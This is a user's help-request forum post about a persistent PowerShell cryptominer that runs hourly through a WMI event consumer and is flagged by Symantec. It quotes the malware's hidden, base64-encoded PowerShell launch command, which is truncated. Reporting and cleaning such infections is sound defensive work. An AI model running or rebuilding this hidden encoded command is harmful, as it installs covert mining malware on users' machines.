randomguy

Hi All, First of all, I believe we have a similar issue to the below: PowerShell Script - Possible Malicious Attack By Marco2526, November 2, 2017 in Malware Finding and Cleaning https://forum.eset.com/topic/13651-powershell-script-possible-malicious-attack/ A powershell script is ran every hour or so (I can forcefully close it to stop the attack but it will start back up). I found the below in the WMI of SysInternals Autoruns. Symantec is constantly reporting this below message when the script is running: [SID: 30253] system infected: bitcoinminer Activity 6 detected. Can anyone please provide assistance? DSM Event Log Consumer %SystemRoot%\system32\WindowsPowerShell\v1.0\PowerShell.exe powershell.exe -NoP -NonI -W Hidden -E JABzAHQAaQBtAGUAPQBbAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBUAGkAYwBrAEMAbwB1AG4AdAANAAoAJABmAHUAbgBzACAAPQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAO....... (there is a huge amount of text that continues here) Kind Regards Regards